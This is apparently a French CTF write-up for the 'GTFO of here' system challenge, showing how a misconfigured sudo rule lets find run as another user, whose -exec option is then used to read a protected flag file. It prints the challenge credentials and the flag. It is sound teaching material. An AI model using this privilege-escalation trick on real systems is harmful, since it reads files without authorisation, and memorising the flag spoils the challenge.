GTFO of here

Catégorie: Système Difficulté: - Flag: CTFREI{GTFOBIN_1s_0p}

Challenge

Description

Votre but est de vous connecter en tant que r00t (à ne pas confondre avec root). Le flag est situé ici: /home/r00t/flag/flag.txt

Connexion SSH: ssh jail@vps.ctfrei.fr -p 4444

Mot de passe: jail

Ce challenge tourne sur un docker et n'est pas disponible

Solution

Une fois connecté, on peut lister les privilèges que l'on a avec la commande sudo -l

jail@13132cebe0e0:/$ sudo -l
Matching Defaults entries for jail on 13132cebe0e0:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User jail may run the following commands on 13132cebe0e0:
    (r00t) NOPASSWD: /usr/bin/find

On voit que l'on peut lancer la commande find avec les droits de r00t.

Cette commande est assez spéciale puisqu'en plus de chercher des fichiers, elle permet également d'exécuter des commandes avec l'option -exec.

Utilisons donc cette commande pour afficher le contenu de /home/r00t/flag/flag.txt avec les droits de r00t.

jail@13132cebe0e0:/$ sudo -u r00t find -exec cat /home/r00t/flag/flag.txt \;
CTFREI{GTFOBIN_1s_0p}
CTFREI{GTFOBIN_1s_0p}
CTFREI{GTFOBIN_1s_0p}
CTFREI{GTFOBIN_1s_0p}

PrécédentBroken Binary 2 SuivantPyjail 1

Dernière mise à jour il y a 1 an

Cet article vous a-t-il été utile ?